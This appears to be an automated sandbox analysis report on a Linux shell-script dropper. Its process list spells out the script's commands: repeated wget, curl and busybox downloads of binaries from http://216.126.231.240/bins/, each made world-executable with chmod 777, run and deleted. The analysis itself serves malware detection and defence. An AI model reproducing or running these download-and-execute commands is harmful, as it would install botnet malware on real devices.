Analysis Overview
SHA256
5e1c33ea279105c302ec4665ddd72c155d9d440ae2c473b803df701c30002518
Threat Level: Shows suspicious behavior
The file 5e1c33ea279105c302ec4665ddd72c155d9d440ae2c473b803df701c30002518.sh was found to be: Shows suspicious behavior.
Malicious Activity Summary
File and Directory Permissions Modification
Executes dropped EXE
Checks CPU configuration
Reads runtime system information
System Network Configuration Discovery
Writes file to tmp directory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-20 02:45
Signatures
Analysis: behavioral3
Detonation Overview
Submitted
2024-11-20 02:45
Reported
2024-11-20 02:48
Platform
debian9-mipsbe-20240611-en
Max time kernel
96s
Max time network
94s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2 | /tmp/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2 | N/A |
| N/A | /tmp/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5 | /tmp/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5 | N/A |
| N/A | /tmp/Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX | /tmp/Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX | N/A |
| N/A | /tmp/kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW | /tmp/kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW | N/A |
| N/A | /tmp/l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI | /tmp/l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI | N/A |
| N/A | /tmp/6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE | /tmp/6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE | N/A |
| N/A | /tmp/U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC | /tmp/U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC | N/A |
| N/A | /tmp/vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz | /tmp/vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz | N/A |
| N/A | /tmp/zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6 | /tmp/zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6 | N/A |
| N/A | /tmp/idkMoRXMipMhw22wQsyL92ITpIX97fCPFV | /tmp/idkMoRXMipMhw22wQsyL92ITpIX97fCPFV | N/A |
| N/A | /tmp/p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783 | /tmp/p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783 | N/A |
| N/A | /tmp/me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17 | /tmp/me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17 | N/A |
| N/A | /tmp/GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF | /tmp/GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF | N/A |
| N/A | /tmp/JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug | /tmp/JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug | N/A |
| N/A | /tmp/GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF | /tmp/GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF | N/A |
| N/A | /tmp/JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug | /tmp/JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug | N/A |
| N/A | /tmp/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2 | /tmp/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2 | N/A |
| N/A | /tmp/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5 | /tmp/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5 | N/A |
| N/A | /tmp/Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX | /tmp/Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX | N/A |
| N/A | /tmp/kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW | /tmp/kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW | N/A |
| N/A | /tmp/l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI | /tmp/l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI | N/A |
| N/A | /tmp/6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE | /tmp/6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE | N/A |
| N/A | /tmp/U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC | /tmp/U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC | N/A |
| N/A | /tmp/vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz | /tmp/vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz | N/A |
| N/A | /tmp/zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6 | /tmp/zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6 | N/A |
| N/A | /tmp/idkMoRXMipMhw22wQsyL92ITpIX97fCPFV | /tmp/idkMoRXMipMhw22wQsyL92ITpIX97fCPFV | N/A |
| N/A | /tmp/p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783 | /tmp/p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783 | N/A |
| N/A | /tmp/me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17 | /tmp/me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17 | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /tmp/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5 | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /tmp/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5 | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /tmp/idkMoRXMipMhw22wQsyL92ITpIX97fCPFV | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /tmp/idkMoRXMipMhw22wQsyL92ITpIX97fCPFV | N/A |
| N/A | N/A | /bin/busybox | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC | /usr/bin/curl | N/A |
| File opened for modification | /tmp/idkMoRXMipMhw22wQsyL92ITpIX97fCPFV | /usr/bin/curl | N/A |
| File opened for modification | /tmp/me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI | /usr/bin/curl | N/A |
| File opened for modification | /tmp/me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF | /usr/bin/curl | N/A |
| File opened for modification | /tmp/JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug | /usr/bin/curl | N/A |
| File opened for modification | /tmp/l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI | /usr/bin/curl | N/A |
| File opened for modification | /tmp/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE | /usr/bin/curl | N/A |
| File opened for modification | /tmp/kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW | /usr/bin/curl | N/A |
| File opened for modification | /tmp/kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW | /usr/bin/curl | N/A |
| File opened for modification | /tmp/JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug | /usr/bin/curl | N/A |
| File opened for modification | /tmp/zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX | /usr/bin/curl | N/A |
| File opened for modification | /tmp/U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC | /usr/bin/curl | N/A |
| File opened for modification | /tmp/vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz | /usr/bin/curl | N/A |
| File opened for modification | /tmp/idkMoRXMipMhw22wQsyL92ITpIX97fCPFV | /usr/bin/curl | N/A |
| File opened for modification | /tmp/p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF | /usr/bin/curl | N/A |
| File opened for modification | /tmp/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX | /usr/bin/curl | N/A |
| File opened for modification | /tmp/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE | /usr/bin/curl | N/A |
| File opened for modification | /tmp/vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz | /usr/bin/curl | N/A |
Processes
/tmp/5e1c33ea279105c302ec4665ddd72c155d9d440ae2c473b803df701c30002518.sh
[/tmp/5e1c33ea279105c302ec4665ddd72c155d9d440ae2c473b803df701c30002518.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://216.126.231.240/bins/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2]
/bin/chmod
[chmod 777 25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2]
/tmp/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2
[./25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2]
/bin/rm
[rm 25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2]
/usr/bin/wget
[wget http://216.126.231.240/bins/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5]
/bin/chmod
[chmod 777 UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5]
/tmp/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5
[./UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5]
/bin/rm
[rm UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5]
/usr/bin/wget
[wget http://216.126.231.240/bins/Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX]
/bin/chmod
[chmod 777 Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX]
/tmp/Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX
[./Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX]
/bin/rm
[rm Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX]
/usr/bin/wget
[wget http://216.126.231.240/bins/kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW]
/bin/chmod
[chmod 777 kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW]
/tmp/kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW
[./kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW]
/bin/rm
[rm kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW]
/usr/bin/wget
[wget http://216.126.231.240/bins/l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI]
/bin/chmod
[chmod 777 l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI]
/tmp/l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI
[./l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI]
/bin/rm
[rm l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI]
/usr/bin/wget
[wget http://216.126.231.240/bins/6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE]
/bin/chmod
[chmod 777 6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE]
/tmp/6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE
[./6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE]
/bin/rm
[rm 6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE]
/usr/bin/wget
[wget http://216.126.231.240/bins/U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC]
/bin/chmod
[chmod 777 U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC]
/tmp/U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC
[./U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC]
/bin/rm
[rm U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC]
/usr/bin/wget
[wget http://216.126.231.240/bins/vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz]
/bin/chmod
[chmod 777 vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz]
/tmp/vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz
[./vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz]
/bin/rm
[rm vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz]
/usr/bin/wget
[wget http://216.126.231.240/bins/zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6]
/bin/chmod
[chmod 777 zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6]
/tmp/zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6
[./zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6]
/bin/rm
[rm zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6]
/usr/bin/wget
[wget http://216.126.231.240/bins/idkMoRXMipMhw22wQsyL92ITpIX97fCPFV]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/idkMoRXMipMhw22wQsyL92ITpIX97fCPFV]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/idkMoRXMipMhw22wQsyL92ITpIX97fCPFV]
/bin/chmod
[chmod 777 idkMoRXMipMhw22wQsyL92ITpIX97fCPFV]
/tmp/idkMoRXMipMhw22wQsyL92ITpIX97fCPFV
[./idkMoRXMipMhw22wQsyL92ITpIX97fCPFV]
/bin/rm
[rm idkMoRXMipMhw22wQsyL92ITpIX97fCPFV]
/usr/bin/wget
[wget http://216.126.231.240/bins/p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783]
/bin/chmod
[chmod 777 p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783]
/tmp/p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783
[./p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783]
/bin/rm
[rm p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783]
/usr/bin/wget
[wget http://216.126.231.240/bins/me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17]
/bin/chmod
[chmod 777 me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17]
/tmp/me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17
[./me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17]
/bin/rm
[rm me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17]
/usr/bin/wget
[wget http://216.126.231.240/bins/GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF]
/bin/chmod
[chmod 777 GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF]
/tmp/GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF
[./GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF]
/bin/rm
[rm GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF]
/usr/bin/wget
[wget http://216.126.231.240/bins/JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug]
/bin/chmod
[chmod 777 JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug]
/tmp/JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug
[./JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug]
/bin/rm
[rm JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug]
/usr/bin/wget
[wget http://216.126.231.240/bins/GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF]
/bin/chmod
[chmod 777 GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF]
/tmp/GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF
[./GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF]
/bin/rm
[rm GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF]
/usr/bin/wget
[wget http://216.126.231.240/bins/JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug]
/bin/chmod
[chmod 777 JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug]
/tmp/JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug
[./JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug]
/bin/rm
[rm JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug]
/usr/bin/wget
[wget http://216.126.231.240/bins/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2]
/bin/chmod
[chmod 777 25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2]
/tmp/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2
[./25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2]
/bin/rm
[rm 25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2]
/usr/bin/wget
[wget http://216.126.231.240/bins/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5]
/bin/chmod
[chmod 777 UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5]
/tmp/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5
[./UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5]
/bin/rm
[rm UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5]
/usr/bin/wget
[wget http://216.126.231.240/bins/Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX]
/bin/chmod
[chmod 777 Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX]
/tmp/Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX
[./Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX]
/bin/rm
[rm Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX]
/usr/bin/wget
[wget http://216.126.231.240/bins/kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW]
/bin/chmod
[chmod 777 kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW]
/tmp/kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW
[./kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW]
/bin/rm
[rm kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW]
/usr/bin/wget
[wget http://216.126.231.240/bins/l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI]
/bin/chmod
[chmod 777 l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI]
/tmp/l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI
[./l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI]
/bin/rm
[rm l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI]
/usr/bin/wget
[wget http://216.126.231.240/bins/6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE]
/bin/chmod
[chmod 777 6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE]
/tmp/6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE
[./6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE]
/bin/rm
